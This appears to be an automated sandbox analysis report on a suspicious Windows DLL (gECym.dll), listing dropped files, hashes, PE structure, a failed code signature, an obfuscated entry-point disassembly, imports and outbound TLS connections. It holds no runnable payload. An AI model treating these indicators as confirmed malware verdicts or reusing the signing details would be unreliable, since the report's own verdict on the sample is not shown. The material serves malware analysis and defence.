                                                              C:\Users\user\AppData\Local\Temp\~DF61B4A5E235D16C22.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):176128
                                                              Entropy (8bit):3.348410225065147
                                                              Encrypted:false
                                                              SSDEEP:3072:cZ/2Bfcdmu5kgTzGtPZ/2Bfc+mu5kgTzGt:VA
                                                              MD5:1BC9D33003AE79A9DC826B9177CE4107
                                                              SHA1:E2FE82C8A27AB5D6FEB48FC0036F41BE4F2753FF
                                                              SHA-256:76493F5DDC21ABC9D0FC4172AC29CE56937AF95407FA16AF758741BD8B99C4A7
                                                              SHA-512:E85C349FB6DA0E3FC7C7C215D3BC919330D9415898894F29AB806161D5AE2854389CED20A5231772E23C0DE03971D2E7C30467FC094012ECE8C20D5B97E780BD
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\~DF9813413A47FA9BB0.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.05700439027613612
                                                              Encrypted:false
                                                              SSDEEP:3:alFXEAUolllHlly+lllX9/Dl/Oly3lgHlXXlRslkhlEkllM+lylhllAlFJejltl:a/vllrNngFAlkxFIBGKj1
                                                              MD5:BAE4F7A74A5A11C6C051F0918C1CECEF
                                                              SHA1:C352D244D87037DE12A8995C84FF85B517F333CE
                                                              SHA-256:8BC3D5AA4632E5A49AD6B02696D9535763AF4CE8D940695035F6EBED411098AE
                                                              SHA-512:B5F643956DEB154C4604ACD45FDE9DD8FF6CF6B4B0801DFA80B96D5A64ED7D37F095BBB2C67D09DC6895C32017B20551996E5387DFB9B34DF494237FB53A40E0
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:MS-DOS executable, MZ for MS-DOS
                                                              Entropy (8bit):6.669453102824052
                                                              TrID:
                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                              • DOS Executable Generic (2002/1) 0.20%
                                                              • VXD Driver (31/22) 0.00%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:gECym.dll
                                                              File size:263072
                                                              MD5:fcb53acd5fd1637a2ac1bc69f396e92c
                                                              SHA1:a09432a56375c5a39856d59e402c3f8642edda7b
                                                              SHA256:cc7045d9fe77c4aa4cb646d01fb4700008a34f58f49358d0b0b0997d21016aab
                                                              SHA512:47bcd8326a65b2a50ee7a9691853c6a6d6a424ad4e0a7760794aa20c137450017793ed9756302666b6b1aed93048d879395a6fde2c95f9b9fc67ca4bd6e38116
                                                              SSDEEP:3072:eb/VDsMK5SdPlKCXbkB9Kv1y5Gun6XKwRDcXEX55d2wNQ+XnwEf4bvuQ5OjrDGZt:WCoMRt6XKUSRACdOj57jY5jM9H8eGN
                                                              File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L...8yoa...........!.........................................................P......z................................@.....

                                                              File Icon

                                                              Icon Hash:70e8d0dcbc30f462

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x100095ff
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x10000000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                              DLL Characteristics:
                                                              Time Stamp:0x616F7938 [Wed Oct 20 02:04:40 2021 UTC]
                                                              TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 91478fc94f6cfd55f2f79a8b82441b87

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 7/29/2015 5:00:00 PM, 7/29/2018 4:59:59 PM
Subject Chain
• CN=Fortinet Technologies (Canada) Inc., O=Fortinet Technologies (Canada) Inc., L=Burnaby, S=British Columbia, C=CA
Version: 3
Thumbprint MD5: CED7C13C8B94994AFFCC6AD7B7DF388F
Thumbprint SHA-1: B27F938A1E7F314A7B60C48EA196961CDAA09F7A
Thumbprint SHA-256: 3C658DDCD37DFA65F69C0B35697EDAA12DBDF68388A9AD54BBEFCF24F786ABB7
Serial: 5755C3BFA958E29EF9DCA3FBA9FC02D4

Entrypoint Preview

Instruction
xor edi, edi
push edi
push edi
call dword ptr [100049F4h]
mov edi, eax
jmp 00007F2CF4914D60h
mov ecx, dword ptr [edx-08h]
lea ecx, dword ptr [ebp-18h]
int3
push esi
mov eax, 004159B8h
int3
jmp dword ptr [0041271Ch]
mov ebp, esp
jmp 00007F2CF4902914h
inc esi
pop ebp
int3
xor ecx, eax
call 00007F2CF49012EEh
xor edx, dword ptr [ebp+28h]
add edx, 46h
xor edx, edx
add edx, 3077A3CDh
xor edx, dword ptr [1003B15Bh]
add edx, 01h
xor edx, dword ptr [ebp+24h]
mov dword ptr [1003BD39h], edx
mov esi, edx
add esi, D6F0E4A5h
sub esi, dword ptr [ebp+28h]
add esi, 648A3A98h
xor esi, 72h
mov dword ptr [ebp+14h], esi
push 10018AA4h
ret
jne 00007F2CF4903086h
mov eax, 00416654h
int3
jmp dword ptr [004126F8h]
call 00007F2CF490245Fh
int3
jmp dword ptr [004121ACh]
int3
int3
jmp dword ptr [0041271Ch]
jmp 00007F2CF4902A43h
xor esi, esi
add esi, dword ptr [1003C07Dh]
sub esi, 284AC1ACh
add esi, dword ptr [1003C34Dh]
mov dword ptr [1003C34Dh], esi
push 1003491Ah
push 1003568Ah
call dword ptr [10004ADCh]

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x400c | 0x84 | .text
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4ba8 | 0xa0 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40000 | 0x1020 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3e600 | 0x1da0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x42000 | 0x27e4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x49b8 | 0x1f0 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b22d | 0x1b400 | False | 0.555260894495 | data | 6.48316057239 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x1d000 | 0x1f0 | 0x200 | False | 0.49609375 | COM executable for DOS | 3.58053780946 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1e000 | 0x21a2a | 0x1e600 | False | 0.583116319444 | data | 6.017622124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x40000 | 0x1020 | 0x1200 | False | 0.330512152778 | data | 3.17732875516 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x42000 | 0x27e4 | 0x2800 | False | 0.80029296875 | data | 6.81110960286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x401c0 | 0x8a8 | data | English | United States
RT_ICON | 0x40a68 | 0x2e8 | data | English | United States
RT_STRING | 0x40d50 | 0x40 | data | English | United States
RT_STRING | 0x40d90 | 0x74 | data | English | United States
RT_GROUP_ICON | 0x40e04 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x40e18 | 0x14 | data | English | United States
RT_VERSION | 0x40e2c | 0x1f4 | data | English | United States

Imports

DLL | Import
kbdal.dll | KbdLayerDescriptor
kernel32.dll | QueryPerformanceFrequency, GetCurrentThreadId, VirtualProtect, WaitForSingleObjectEx, QueryPerformanceCounter, EnterCriticalSection, CreateDirectoryW, GlobalFree, GetStartupInfoW, AttachConsole, SetCurrentDirectoryW, WaitForSingleObject, GlobalLock, LocalAlloc, GetTempPathW, GetCurrentProcess, GetTickCount, GetLastError, GetModuleHandleW, AllocConsole, FindNextFileW, SetEvent, LocalFree, ResetEvent, ReadConsoleW, GlobalUnlock, IsProcessorFeaturePresent, Sleep, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, FindClose, GetSystemDefaultUILanguage, GetStdHandle, InitializeSListHead, OpenProcess, CloseHandle, CreateWaitableTimerW, CreateEventW, GetModuleHandleA, TerminateProcess, GetUserDefaultUILanguage, LeaveCriticalSection, SetConsoleTitleW, SetWaitableTimer, WriteConsoleW, DeleteCriticalSection, FindFirstFileW, GetCurrentProcessId, GetCommandLineW, SetUnhandledExceptionFilter, SetConsoleTextAttribute, UnhandledExceptionFilter, GlobalSize, GetProcAddress
ole32.dll | PropVariantClear, StringFromGUID2, CoUninitialize, RegisterDragDrop, CreateItemMoniker, CreateStreamOnHGlobal, GetRunningObjectTable, OleInitialize, CoCreateInstance, OleUninitialize, RevokeDragDrop, CoCreateGuid, CoTaskMemFree, CoInitializeEx
shell32.dll | SHChangeNotify, CommandLineToArgvW, ShellExecuteW
shlwapi.dll | PathCompactPathExW, PathFindExtensionW, PathBuildRootW, PathGetDriveNumberW, PathStripPathW, PathRemoveExtensionW, PathIsNetworkPathW
user32.dll | GetClientRect, RegisterClipboardFormatW, IsWindow, SetKeyboardState, SetCapture, GetKeyboardState, ReleaseCapture, TranslateMessage, GetWindowRect, GetWindowInfo, SetWindowLongW, IsWindowVisible, ShowWindow, GetParent, LoadIconW, ClientToScreen, ScreenToClient, TrackPopupMenu, MsgWaitForMultipleObjectsEx, DestroyMenu, GetSystemMetrics, IsIconic, GetKeyState, GetCursorPos, RegisterClassW, GetWindowLongW, SetWindowPos, PostMessageW, IsClipboardFormatAvailable, DispatchMessageW, MessageBoxW, SetCursorPos, AppendMenuW, CreatePopupMenu, SetCursor, CreateWindowExW, DefWindowProcW
wmpshell.dll | DllUnregisterServer

Exports

Name | Ordinal | Address
DllUnregisterServer | 1 | 0x10006e4f
DllRegisterServer | 2 | 0x1000dfa9
DllGetClassObject | 3 | 0x10013662
DllCanUnloadNow | 4 | 0x1001658e

Version Infos

Description | Data
InternalName | Similative
PrivateBuild | Crystallic
LegalTrademarks | Codeine
FileVersion | 6, 7, 8, 6
CompanyName | Star Force
Translation | 0x0409 0x04e4

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States | (map image not included)

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2021 15:08:35.889739037 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.889781952 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.889837980 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.889863014 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.889867067 CEST | 443 | 49785 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.890306950 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.891561031 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.891627073 CEST | 443 | 49785 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.892085075 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.892107010 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.932991982 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.933101892 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.939477921 CEST | 443 | 49785 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.939654112 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.939768076 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.939785957 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.940016985 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.940082073 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.940695047 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.949043036 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.949062109 CEST | 443 | 49785 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.949428082 CEST | 443 | 49785 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.949606895 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.972785950 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.972893000 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:35.972942114 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.972973108 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.975054026 CEST | 49784 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:35.975086927 CEST | 443 | 49784 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:42.157363892 CEST | 49820 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.157413960 CEST | 443 | 49820 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.157511950 CEST | 49820 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.159472942 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.159528971 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.159689903 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.161057949 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.161096096 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.176109076 CEST | 49820 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.176148891 CEST | 443 | 49820 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.210551977 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.210813046 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.214256048 CEST | 443 | 49820 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.214443922 CEST | 49820 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.306514978 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.306580067 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.307080984 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.307097912 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.307351112 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.307446957 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.315216064 CEST | 49820 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.315546036 CEST | 443 | 49820 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.315674067 CEST | 49820 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338458061 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338540077 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338579893 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338610888 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338618040 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338632107 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338684082 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338690042 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338704109 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338733912 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338762999 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338767052 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338778019 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338808060 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338845968 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338855982 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338876009 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:42.338898897 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.338929892 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.683657885 CEST | 49821 | 443 | 192.168.2.5 | 104.26.7.139
Oct 20, 2021 15:08:42.683698893 CEST | 443 | 49821 | 104.26.7.139 | 192.168.2.5
Oct 20, 2021 15:08:50.291220903 CEST | 49824 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.291261911 CEST | 443 | 49824 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.291372061 CEST | 49824 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.295773029 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.295825005 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.295924902 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.303937912 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.303991079 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.312355995 CEST | 49826 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.312412977 CEST | 443 | 49826 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.312592030 CEST | 49826 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.314461946 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.314502954 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.319432020 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.319477081 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.319484949 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.364216089 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.364347935 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.364407063 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.364474058 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.366620064 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.366776943 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.391625881 CEST | 49824 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.391660929 CEST | 443 | 49824 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.398144007 CEST | 49826 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.398180962 CEST | 443 | 49826 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.405420065 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.405445099 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.405740976 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.405746937 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.405890942 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.405967951 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.410784006 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.410813093 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.411187887 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.411247969 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.411518097 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.429982901 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.430090904 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.430093050 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.430143118 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.434802055 CEST | 443 | 49826 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.434899092 CEST | 49826 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.435770988 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.435842991 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.435859919 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.435877085 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.435908079 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.435935020 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.439907074 CEST | 49826 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.440288067 CEST | 443 | 49826 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.440395117 CEST | 49826 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.442406893 CEST | 443 | 49824 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.442539930 CEST | 49824 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.459805965 CEST | 49825 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.459852934 CEST | 443 | 49825 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.471353054 CEST | 49827 | 443 | 192.168.2.5 | 104.26.3.70
Oct 20, 2021 15:08:50.471389055 CEST | 443 | 49827 | 104.26.3.70 | 192.168.2.5
Oct 20, 2021 15:08:50.476639986 CEST | 49824 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.476687908 CEST | 443 | 49824 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.477035999 CEST | 443 | 49824 | 172.217.168.38 | 192.168.2.5
Oct 20, 2021 15:08:50.477119923 CEST | 49824 | 443 | 192.168.2.5 | 172.217.168.38
Oct 20, 2021 15:08:50.924978971 CEST | 443 | 49785 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:50.925075054 CEST | 443 | 49785 | 104.20.184.68 | 192.168.2.5
Oct 20, 2021 15:08:50.925162077 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:50.925190926 CEST | 49785 | 443 | 192.168.2.5 | 104.20.184.68
Oct 20, 2021 15:08:55.885663986 CEST | 49832 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.885710001 CEST | 443 | 49832 | 151.101.1.44 | 192.168.2.5
Oct 20, 2021 15:08:55.885741949 CEST | 49833 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.885788918 CEST | 443 | 49833 | 151.101.1.44 | 192.168.2.5
Oct 20, 2021 15:08:55.885802984 CEST | 49832 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.885812044 CEST | 49834 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.885848045 CEST | 443 | 49834 | 151.101.1.44 | 192.168.2.5
Oct 20, 2021 15:08:55.885853052 CEST | 49833 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.885911942 CEST | 49834 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.898684025 CEST | 49835 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.898715973 CEST | 443 | 49835 | 151.101.1.44 | 192.168.2.5
Oct 20, 2021 15:08:55.898796082 CEST | 49835 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.898904085 CEST | 49836 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.898933887 CEST | 443 | 49836 | 151.101.1.44 | 192.168.2.5
Oct 20, 2021 15:08:55.899028063 CEST | 49836 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.899316072 CEST | 49837 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.899333000 CEST | 443 | 49837 | 151.101.1.44 | 192.168.2.5
Oct 20, 2021 15:08:55.899457932 CEST | 49837 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.900875092 CEST | 49837 | 443 | 192.168.2.5 | 151.101.1.44
Oct 20, 2021 15:08:55.900890112 CEST | 443 | 49837 | 151.101.1.44 | 192.168.2.5
Oct 20, 2021 15:08:55.902029037 CEST | 49836 | 443 | 192.168.2.5 | 151.101.1.44
                                                              Oct 20, 2021 15:08:55.902056932 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.902887106 CEST49835443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.902904987 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.903769016 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.903790951 CEST44349834151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.939388037 CEST44349837151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.939487934 CEST44349836151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.939570904 CEST49837443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.939625025 CEST49836443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.940915108 CEST44349835151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.942815065 CEST49835443192.168.2.5151.101.1.44
